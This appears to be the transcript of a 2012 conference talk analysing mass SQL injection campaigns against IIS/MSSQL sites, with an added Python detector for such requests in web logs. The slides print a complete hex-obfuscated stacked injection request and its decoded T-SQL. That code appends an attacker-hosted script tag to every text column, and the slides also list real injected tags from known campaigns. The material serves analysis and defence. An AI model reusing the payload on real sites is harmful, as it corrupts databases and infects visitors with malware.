Analysis of mass SQL injection attacks
These are the slides from a talk "Analysis of mass SQL injection attacks" held at FSec 2012 conference (Croatia / Varazdin 21st September 2012) by Miroslav Stampar
Presentation Transcript

  • Analysis of mass SQL injection attacks Miroslav Štampar (dev@sqlmap.org)
  • FUD (Fear, Uncertainty, Doubt)
    “A new virus is making the rounds and is wreaking havoc on the Internet”
    “Whatever language is used to write to the database, all SQL databases use the same basic formulas for writing and retrieving data”
    “Targets that bottleneck in the technology, making it platform-independent… Whether the machine is using ASP, ColdFusion, JSP, PHP, or whatever else”
    “...blazing through the internet, infecting more than half a million domains around the world to date and as many as 1.5 million URLs”
    FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012
  • Google is (not) your friend (1)
  • Google is (not) your friend (2)
  • Google is (not) your friend (3)
  • What's it all about?
    - Platform dependent (IIS/ASP(.NET))
    - DBMS dependent (Microsoft SQL Server)
    - Highly automated (tool-based) approach
    - Popular SQL enumeration tools with or without Google search capability don't count (e.g. sqlmap, Havij, Pangolin)
    - Infection(s) counting in thousands of domains (not millions as previously believed)
    - As dumb as it gets (usually one request per target)
    - In short: malware distribution
  • Modus operandi
    - Get hands on a couple of 1-day exploits
    - Blindly inject a SQL payload carrying malicious content (<script>, <iframe>, etc.) into the content tables of as many vulnerable web servers as possible
    - Leverage the exploit(s) and/or users' lack of technical knowledge to install malware (spyware, trojans, etc.) on visitors' computers
    - Profit(???) (DEFCON 18 – Garry Pejski: “My Life As A Spyware Developer”)
  • Sample leveraged exploits
    - CVE-2012-4681 Oracle Java 7 Update 6
    - CVE-2012-1889 Microsoft XML Core Services
    - CVE-2012-1723 Java Runtime Environment
    - CVE-2012-0507 Java Runtime Environment
    - CVE-2011-3544 Java Runtime Environment
    - CVE-2011-2110 Adobe Flash Player
    - CVE-2011-0611 Adobe Flash Player
    - CVE-2010-3552 New Java Plug-in
    - CVE-2010-0188 Adobe Reader
    - etc.
  • Notable members (1)
    - Lilupophilupop (sl.php): "></title><script src="http://lilupophilupop.com/sl.php"></script><!--
    - Nikjju (r.php): <script src=http://nikjju.com/r.php></script>
    - Robint (u.js): <script src=http://ww.robint.us/u.js></script>
    - LizaMoon (ur.php): </title><script src=http://lizamoon.com/ur.php></script>
    - Jjghui (urchin.js): </title><script src=http://jjghui.com/urchin.js></script>
  • Notable members (2)
  • Notable members (3)
  • Generic payload (obfuscated)
    GET /vuln.asp?param=1;DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220............................................................5845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E63686B6164772E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220 AS VARCHAR(4000));EXEC(@S);--
  • Generic payload (decoded)
    DECLARE @t VARCHAR(255), @c VARCHAR(255)
    DECLARE table_cursor CURSOR FOR
      SELECT a.name, b.name FROM sysobjects a, syscolumns b
      WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) /* NTEXT, TEXT, NVARCHAR, VARCHAR */
    OPEN table_cursor
    FETCH NEXT FROM table_cursor INTO @t, @c
    WHILE (@@FETCH_STATUS=0)
    BEGIN
      EXEC('UPDATE ['+@t+'] SET ['+@c+']=RTRIM(CONVERT(VARCHAR,['+@c+']))+''<script src=http://www.attacker.com/malicious.js></script>''')
      FETCH NEXT FROM table_cursor INTO @t, @c
    END
    CLOSE table_cursor
    DEALLOCATE table_cursor
  • Analysis (1)
    - Piggy-backing (stacked) SQL injection
    - Obfuscated SQL code (hex encoded)
    - Decoded code dynamically executed with the T-SQL EXEC command
    - Usage of a cursor for the update
    - Iterating over all tables / all text-like columns
    - Appending malicious content (e.g. <script src=...) to all matched column entries using an UPDATE statement
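The obfuscated payload and the analysis above translate directly into a log-side check. The Python below is an added example (not code from the talk or from sqlmap): it URL-decodes web server request lines, pulls the hex blob out of the CAST(0x... AS VARCHAR) wrapper, decodes it, and reports which building blocks of the decoded payload it contains (cursor over sysobjects/syscolumns, dynamic EXEC, UPDATE over every text column, injected <script> tag). The log lines, the shortened payload and the example.invalid URL are constructed for the demo.

```python
import re
from urllib.parse import unquote_plus

# Hex blob inside CAST(0x... AS VARCHAR(n)) / NVARCHAR(n), matched after URL-decoding.
HEX_CAST_RE = re.compile(r"CAST\s*\(\s*0x([0-9a-fA-F]+)\s+AS\s+N?VARCHAR", re.I)

# Building blocks of the mass-injection payload, checked on the decoded SQL.
MARKERS = {
    "cursor": re.compile(r"DECLARE\s+\w+\s+CURSOR\s+FOR", re.I),
    "schema_walk": re.compile(r"FROM\s+sysobjects\s+\w*\s*,\s*syscolumns", re.I),
    "dynamic_exec": re.compile(r"EXEC\s*\(", re.I),
    "update_all_text": re.compile(r"UPDATE\s+\[\s*'\s*\+\s*@\w+\s*\+\s*'\s*\]", re.I),
    "script_tag": re.compile(r"<\s*script\b|<\s*iframe\b", re.I),
}

def decode_hex_sql(blob: str) -> str:
    """Decode the 0x... blob; drop a dangling nibble from a truncated log line."""
    if len(blob) % 2:
        blob = blob[:-1]
    return bytes.fromhex(blob).decode("latin-1")  # payloads are plain ASCII; never raises

def analyse_request(line: str) -> dict:
    """Classify one request line: hex CAST present, decoded SQL, markers hit, verdict."""
    text = unquote_plus(line)
    m = HEX_CAST_RE.search(text)
    if not m:
        return {"hex_cast": False, "decoded": "", "markers": [], "suspicious": False}
    decoded = decode_hex_sql(m.group(1))
    hits = [name for name, rx in MARKERS.items() if rx.search(decoded)]
    # Hex-wrapped SQL that reaches EXEC is already rare in legitimate traffic;
    # cursor + schema walk together is the signature of the "update every text column" payload.
    suspicious = "dynamic_exec" in hits or {"cursor", "schema_walk"} <= set(hits)
    return {"hex_cast": True, "decoded": decoded, "markers": hits, "suspicious": suspicious}

def scan(lines):
    return [analyse_request(line) for line in lines]

# Constructed sample: a shortened variant of the decoded payload, hex-encoded the way
# the attack tools do and embedded in an IIS-style request line, plus two benign lines.
_SAMPLE_SQL = ("DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR "
               "SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id "
               "EXEC('UPDATE ['+@T+'] SET ['+@C+']=''<script src=http://example.invalid/m.js></script>''')")
SAMPLE_LOG = [
    "GET /vuln.asp?param=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    + _SAMPLE_SQL.encode().hex().upper() + "%20AS%20VARCHAR(4000));EXEC(@S);-- 200",
    "GET /vuln.asp?param=1 200",
    "GET /search.asp?q=CAST(0x48656C6C6F%20AS%20VARCHAR(10)) 200",  # hex, but just 'Hello'
]

if __name__ == "__main__":
    for line, r in zip(SAMPLE_LOG, scan(SAMPLE_LOG)):
        print("SUSPICIOUS" if r["suspicious"] else "ok", r["markers"], line[:60])
```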
  • Analysis (2)
  • Analysis (3)
  • Example (1) - FAIL
  • Example (2) - FAIL
  • Example (3) - FAIL
  • Example (4) – CLUSTER FAIL
  • Example (5) - SUCCESS
  • Example (6) - SUCCESS
  • Asprox (1)
    - Spam botnet used for phishing scams (>10K bots)
    - Developed over years
    - Interesting update: “msscntr32.exe” (SQL attack tool)
    - Google search for targets (e.g. inurl:".asp")
    - Launch SQL injection attacks against the resulting pages
  • Asprox (2)
  • CLI (1)
    - Standalone executable
    - Rare beast (Chinese underground forums?)
    - Google search for targets (e.g. inurl:".asp" inurl:"a=")
    - Configurable malicious tag that will be inserted (originally <script src=http://www.2117966.net/fuckjp.js></script>)
    - Wild guess is that attackers are being paid for using the tool (backcall to *.cn/pay.asp?SN=...)
  • CLI (2)
  • Sample tool (1)
  • Sample tool (2)
  • Sample tool (3)
  • Sample tool (4)
  • Sample tool (5)
  • Sample run (1)
  • Sample run (2)
  • Sample run (3)
  • Sample run (4)
  • Sample run (5)
  • Sample run (6)
  • Sample run (7)
  • Sample run (8)
  • Questions?